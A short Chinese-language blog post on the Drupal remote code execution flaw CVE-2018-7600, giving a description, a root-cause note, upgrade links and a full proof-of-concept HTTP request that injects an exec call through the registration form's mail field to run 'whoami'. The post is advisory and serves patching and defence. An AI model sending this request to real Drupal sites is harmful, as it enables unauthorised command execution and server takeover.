Drupal 代码执行漏洞POC(CVE-2018-7600)

漏洞描述:Drupal 6,7,8多个子版本存在远程代码执行漏洞

漏洞原理:Drupal Render API 对于 # 开头的参数变量有特殊处理,Drupal 8.5 提供了 Ajax 上传头像的点,并且明显存在一个 $form 数组的操纵

加固建议:升级正道是沧桑

7.x版本,更新到 7.58 https://www.drupal.org/project/drupal/releases/7.58

8.5.x版本,更新到 8.5.1 https://www.drupal.org/project/drupal/releases/8.5.1

8.4.x 版本,更新到 8.4.6 https://www.drupal.org/project/drupal/releases/8.4.6

8.3.x 版本,更新到 8.3.9 https://www.drupal.org/project/drupal/releases/8.3.9

代码分析进行中,POC过程供参考

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: 192.168.0.10:32770
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 107

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=whoami

getshell

没有代码佐证略显无聊,先这样,万一有需要防批量的呢

Referer

https://paper.seebug.org/567/?from=timeline&isappinstalled=0

https://research.checkpoint.com/uncovering-drupalgeddon-2/

发表评论

电子邮件地址不会被公开。 必填项已用*标注